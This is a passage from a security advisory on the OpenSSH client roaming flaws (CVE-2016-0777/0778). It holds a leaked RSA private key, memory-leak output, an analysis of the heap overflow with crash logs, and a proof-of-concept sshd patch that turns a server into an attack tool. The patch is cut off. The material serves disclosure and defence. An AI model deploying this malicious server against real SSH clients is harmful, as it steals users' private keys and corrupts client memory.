rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-a2bbc5f6/infoleak
cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
strings /tmp/roaming-47b46456/infoleak
RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9
strings /tmp/roaming-7a6717ae/infoleak
cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
strings /tmp/roaming-f3091f08/infoleak
lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
strings /tmp/roaming-62a9e9a3/infoleak
lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P
strings /tmp/roaming-8de31ed5/infoleak
7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
strings /tmp/roaming-f5e0fbcc/infoleak
yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
strings /tmp/roaming-9be933df/infoleak
QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
strings /tmp/roaming-ee4d1e6c/infoleak
SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
strings /tmp/roaming-c2bfd69c/infoleak
SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
strings /tmp/roaming-2b3217a1/infoleak
DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
strings /tmp/roaming-1e275747/infoleak
g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================
Analysis
Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:
239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }
-
packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
-
ssh_connect() opens new file descriptors, and connects them to the SSH server.
-
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
-
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.
The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:
-
In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
-
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
-
packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in
/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
